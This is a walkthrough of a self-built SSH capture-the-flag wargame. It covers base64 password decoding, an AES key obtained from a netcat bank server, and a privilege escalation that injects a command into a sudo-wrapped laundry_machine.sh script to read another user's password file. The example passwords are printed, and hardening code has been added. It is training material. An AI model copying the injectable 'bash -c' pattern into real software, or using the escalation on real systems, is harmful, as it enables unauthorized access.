Trapdoor CTF Walkthrough
   *   )                (
 ` )  /((      )        )\ )         (
  ( )(_))(  ( /( `  )  (()/( (    (  )(
 (_(_()|()\ )(_))/(/(   ((_)))\   )\(()\
 |_   _|((_|(_)_((_)_\  _| |((_) ((_)((_)
   | | | '_/ _` | '_ \) _` / _ \/ _ \ '_|
   |_| |_| \__,_| .__/\__,_\___/\___/_|
                |_|
trapdoor0@localhost:~$

Description

Trapdoor CTF is a multi-level challenge I created that progressively increases in difficulty. Each level represents a different themed security scenario, requiring participants to apply various cybersecurity concepts and techniques to capture the flag and advance to the next level.

The CTF is hosted on a dedicated server, accessible to participants through SSH. Participants will start at level 0 and progress through the levels by solving challenges and obtaining the flag (password) for the next level.

For a limited time you can try the Trapdoor CTF for yourself:

    ssh trapdoor0@172.233.130.165  
    Password: trapdoor0

Please be respectful of the server and have fun.

Level 0:

Description

This level serves as a basic introduction to the game. None of the passwords shown in this document are current; they are examples only.

Steps

Log in.

    ssh [email protected]  
    Password: trapdoor0

Look around.
trapdoor0@localhost:~$ ls -la
total 48
drwx------  3 trapdoor0 trapdoor0 4096 Oct  3 21:43 .
drwxr-xr-x 10 root      root      4096 Jun 12 01:37 ..
-rw-------  1 trapdoor0 trapdoor0  131 Oct  3 21:43 .bash_history
-rw-r--r--  1 trapdoor0 trapdoor0  220 Jan  7  2023 .bash_logout
-rw-r--r--  1 trapdoor0 trapdoor0 3771 Jan  7  2023 .bashrc
drwx------  2 trapdoor0 trapdoor0 4096 Oct  3 21:24 .cache
-rw-r--r--  1 trapdoor0 trapdoor0 1537 Jun 12 01:37 dossier.txt
-r--r--r--  1 trapdoor0 trapdoor0  223 Jun 12 01:37 .encoded_password.txt
-rwxr-xr-x  1 trapdoor0 trapdoor0  445 Jun 12 01:37 hints.sh
-rw-r--r--  1 root      root       350 Jun 12 01:37 instructions.txt
-r--------  1 trapdoor0 trapdoor0   53 Jun 12 01:37 passwords
-rw-r--r--  1 trapdoor0 trapdoor0  807 Jan  7  2023 .profile
trapdoor0@localhost:~$

Check out the hidden file .encoded_password.txt.
trapdoor0@localhost:~$ cat .encoded_password.txt
admin: SnliNlBNbStKZDkzYktJcgo=
tech_service: a1B6dDBWZUNzNVFVOGVaSwo=
admin_69: blgxS09HYTR0K3MxcHcrcQo=
trapdoor1: bitGcW0vNnQyWFRsNmZMRwo=
bank_wire_cay: QXlJM2ZZOVRJU2hWN3QxYwo=
xeno_server555: ZUVoU2JGTG4rNGx4ejZ5ego=
trapdoor0@localhost:~$

Decode the password for trapdoor1.

trapdoor0@localhost:~$ echo "bitGcW0vNnQyWFRsNmZMRwo=" | base64 -d
n+Fqm/6t2XTl6fLG

Level 1: The Bank

Description

This level contains several documents that pertain to banking, as well as a binary executable called bank_server. When run, it opens a local socket that can be connected to using netcat.

Steps:

Log in and look around.

trapdoor1@localhost:~$ ls -la
total 5932
drwx------  3 trapdoor1 trapdoor1    4096 Oct  3 22:03 .
drwxr-xr-x 10 root      root         4096 Jun 12 01:37 ..
-rwxr-xr-x  1 trapdoor1 trapdoor1 6031856 Jun 12 01:37 bank_server
-rw-r--r--  1 root      root          515 Jun 12 01:37 bank_statement.csv
-rw-r--r--  1 trapdoor1 trapdoor1     220 Jan  7  2023 .bash_logout
-rw-r--r--  1 trapdoor1 trapdoor1    3771 Jan  7  2023 .bashrc
drwx------  2 trapdoor1 trapdoor1    4096 Oct  3 22:03 .cache
-rwx------  1 trapdoor1 trapdoor1      17 Jun 12 01:37 .password
-rw-r--r--  1 trapdoor1 trapdoor1     807 Jan  7  2023 .profile
-rw-r--r--  1 root      root           65 Jun 12 01:37 secret_message.txt
-rw-r--r--  1 root      root          671 Jun 12 01:37 wire_transfers.txt
trapdoor1@localhost:~$

Start the bank server.

trapdoor1@localhost:~$ ./bank_server
[*] Bank server is listening on 0.0.0.0:9971

Note the port the server is listening on, then open another shell as trapdoor1 and connect to the bank server using netcat and that port.

trapdoor1@localhost:~$ nc localhost 9971
Welcome to Ethan Overflow's Bank Server
Enter your query (server_query <transfer_date> <transfer_amount>): 

When you correctly query the bank server, it gives you back an encryption key. We can use this key to decrypt the secret message flag, which is AES-256 encrypted. The correct query is found in wire_transfers.txt.

trapdoor1@localhost:~$ nc localhost 9971
Welcome to Ethan Overflow's Bank Server
Enter your query (server_query <transfer_date> <transfer_amount>): server_query 2023-05-06 100000
Querying transfer details...
Transfer to Enigma Ltd. successful.
Additional information: Enigma Ltd. is a shell corporation owned by Ethan Overflow.
Funds were used to purchase specialized hacking equipment.
Transfer complete. Encryption Key: Sh7Y8aw5UMeLij7B
Enter your query (server_query <transfer_date> <transfer_amount>):
trapdoor1@localhost:~$ cat secret_message.txt
U2FsdGVkX1/auvWLDVmY2Bnuc2nVeYG0g62OAwbu1LdHxD8tvm1zNCUPr3fxbLSf
trapdoor1@localhost:~$ echo "U2FsdGVkX1/auvWLDVmY2Bnuc2nVeYG0g62OAwbu1LdHxD8tvm1zNCUPr3fxbLSf" | openssl enc -d -aes-256-cbc -a -salt -pass pass:Sh7Y8aw5UMeLij7B
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
iRABFB2Vg38p0ZR2
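The warning above comes from the default key derivation in `openssl enc`: without `-pbkdf2`, the passphrase and the 8-byte salt stored in the blob go through a single MD5 round (EVP_BytesToKey), so a weak passphrase is fast to guess offline. As an added example (not part of the CTF), this script pulls apart the envelope that `openssl enc -salt` wrote around the Level 1 flag, using only the blob printed above and POSIX `od`:

```shell
#!/bin/sh
# Added example (not the CTF's own code): inspect the `openssl enc -salt` envelope
# around the Level 1 flag. BLOB is the exact output of `cat secret_message.txt`.
# Layout: 8-byte magic "Salted__" | 8-byte random salt | AES-256-CBC ciphertext.
# The salt is stored in the clear; with the deprecated KDF the key and IV are
# derived from (passphrase, salt) by one MD5 round, which is why openssl
# recommends `-pbkdf2 -iter N` (a deliberately slow derivation) instead.
BLOB='U2FsdGVkX1/auvWLDVmY2Bnuc2nVeYG0g62OAwbu1LdHxD8tvm1zNCUPr3fxbLSf'

# Raw bytes of a base64 blob passed as a string (no trailing newline added).
blob_bytes() { printf '%s' "$1" | base64 -d; }

# Lowercase hex of bytes [offset, offset+count) using only POSIX od.
blob_hex() { blob_bytes "$1" | od -An -tx1 -j"$2" -N"$3" | tr -d ' \n'; }

# "yes" if the first 8 bytes spell Salted__ (53 61 6c 74 65 64 5f 5f).
openssl_is_salted() {
    [ "$(blob_hex "$1" 0 8)" = "53616c7465645f5f" ] && echo yes || echo no
}

# The 8-byte salt as 16 hex characters.
openssl_salt_hex() { blob_hex "$1" 8 8; }

# Ciphertext bytes after the 16-byte header; CBC output is a multiple of 16.
openssl_ciphertext_len() {
    total=$(blob_bytes "$1" | wc -c | tr -d ' ')
    echo $(( total - 16 ))
}

if [ "$(openssl_is_salted "$BLOB")" = yes ]; then
    echo "salt: $(openssl_salt_hex "$BLOB")"
    echo "ciphertext bytes: $(openssl_ciphertext_len "$BLOB")"
fi
```

The 32 ciphertext bytes are two AES blocks: the 16-character flag plus its newline, PKCS#7-padded to 32.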

Level 2: The Prison

Description:

This level has a directory called ‘prison’ which contains a bunch of inmate directories. It also contains a directory called ‘warden’. Looking at the warden directory, there are multiple files that implicate prisoner 69 for tampering with the laundry machine. There is also a file called trapdoor3_password; however, trapdoor2 does not have permission to read it.

trapdoor2@localhost:~/prison/warden$ ls
incident_report.txt  journal.txt  memo.txt  shift_schedule.txt  trapdoor3_password.txt

Investigating inmate69’s directory reveals that he has infiltrated the security system by hacking the laundry system’s firmware, and that he has hidden a copy of the firmware in the directory of another inmate. Let’s search the rest of the inmate directories for clues by grepping for the keyword “laundry”.

trapdoor2@localhost:~$ grep -r "laundry"
prison/inmate69/notebook.txt:Day 3: Success! I found a vulnerability in the laundry machine software that allows arbitrary command execution. I can use it to escalate my privileges and access restricted areas.
prison/inmate333/laundry_machine.sh:echo 'Please enter your laundry settings: '
prison/inmate333/laundry_machine.sh:result=$(sudo -u laundry bash -c "$settings")
prison/warden/journal.txt:I have my suspicions that inmate 69 has been attempting to exploit the vulnerability in the laundry machine software. The incident report from last week confirms that the inmate has knowledge of the vulnerability. I need to ensure that proper security measures are in place to prevent any unauthorized access.
prison/warden/incident_report.txt:Incident: Inmate 69 caught tampering with the laundry machine.
prison/warden/incident_report.txt:Details: Inmate 69 was found attempting to access the laundry machine's software system. Further investigation revealed that the inmate had knowledge of a potential vulnerability in the software.
grep: prison/warden/trapdoor3_password.txt: Permission denied
prison/warden/memo.txt:A vulnerability has been discovered in the laundry machine software. An update is pending to address the issue. In the meantime, keep a close eye on inmate activities related to the laundry room.
trapdoor2@localhost:~$

Looks like the copy of the laundry software is in inmate333’s directory; let’s go there and check it out.

trapdoor2@localhost:~$ cd prison/inmate333
trapdoor2@localhost:~/prison/inmate333$ ls
laundry_machine.sh
trapdoor2@localhost:~/prison/inmate333$ cat laundry_machine.sh
#!/bin/bash
echo 'Welcome to PrisonWorld Laundry-matic!'
echo 'Please enter your laundry settings: '
read -r settings
result=$(sudo -u laundry bash -c "$settings")
echo "Ding! $result"
trapdoor2@localhost:~/prison/inmate333$

It looks like the laundry machine runs whatever is entered as a command at its own privilege level (the laundry user), so let’s see if we can use it for a privilege escalation attack and print out the trapdoor3 password file in the warden’s directory.

trapdoor2@localhost:~/prison/inmate333$ ./laundry_machine.sh
Welcome to PrisonWorld Laundry-matic!
Please enter your laundry settings:
cat /home/trapdoor2/prison/warden/trapdoor3_password.txt
Ding! eL+mdvXWl/Tnv4Cd
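The root cause is that laundry_machine.sh hands raw input to `sudo -u laundry bash -c`, so the "settings" are parsed as a shell command running as another user. As an added example (not the CTF's own fix), here is a hardened version that accepts only allow-listed settings and passes the chosen one as a single argument to a fixed helper; `/usr/local/bin/laundry-cycle` and the sudoers line in the comments are hypothetical:

```shell
#!/bin/bash
# Added example (not the CTF's own code): a hardened laundry_machine.sh.
# The original runs `sudo -u laundry bash -c "$settings"`, so whatever the
# user types is parsed by a shell running as the laundry user. Two changes:
#   1. only an allow-listed setting ever leaves this script, and
#   2. it is passed as one argv element to a fixed program, never to `bash -c`,
#      so ';', '$(...)', '|' and friends in the input are never interpreted.
# LAUNDRY_CYCLE is a hypothetical helper; sudoers should then grant only
#   trapdoor2 ALL=(laundry) NOPASSWD: /usr/local/bin/laundry-cycle
# rather than an unrestricted shell as the laundry user.
LAUNDRY_CYCLE=${LAUNDRY_CYCLE:-/usr/local/bin/laundry-cycle}

# Print the setting if it is on the allow list, otherwise return 1.
validate_setting() {
    case "$1" in
        hot|warm|cold|delicate) printf '%s\n' "$1" ;;
        *) return 1 ;;
    esac
}

# The exact argv that would run, one element per line (for inspection and tests).
laundry_argv() {
    setting=$(validate_setting "$1") || return 1
    printf '%s\n' sudo -u laundry "$LAUNDRY_CYCLE" --mode "$setting"
}

# Same behaviour as the original prompt, but the input never reaches a shell.
run_laundry() {
    setting=$(validate_setting "$1") || { echo 'Ding! Unknown setting, cycle refused.'; return 1; }
    result=$(sudo -u laundry "$LAUNDRY_CYCLE" --mode "$setting")
    echo "Ding! $result"
}

# Interactive prompt only when explicitly requested (LAUNDRY_INTERACTIVE=1).
if [ "${LAUNDRY_INTERACTIVE:-0}" = 1 ]; then
    echo 'Welcome to PrisonWorld Laundry-matic!'
    echo 'Please enter your laundry settings: '
    read -r settings
    run_laundry "$settings"
fi
```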

Level 3: The Missile Silo

Description:

This level finds you in a top secret missile silo. The missile silo computer system contains some documents with clues suggesting that you need to find the launch code. There is also a program called ‘trace’ that can parse Wireshark pcap files, as well as a couple of pcap files the players can use with the trace program.

In the it_memo.txt document there is a binary string at the bottom. Let’s decode that string and see what it says:

trapdoor3@localhost:~$ echo "01010000011000010110001101101011011001010111010000100000011000100110001001100110001000000100000101000011010010110010000001101110011101010110110101100010011001010111001000100000011010000110100101100100011001000110010101101110001000000110100101101110001000000110110001100001011100100110011101100101010011010110100101111000001011100111000001100011011000010111000000100000011010000110111101101100011001000111001100100000011101000110100001100101001000000110101101100101011110010010000001110100011011110010000001110011011101010110001101100011011001010111001101110011" | perl -lpe '$_=pack"B*",$_'
Packet bbf ACK number hidden in largeMix.pcap holds the key to success

This is the end of this guide as this level is still under construction.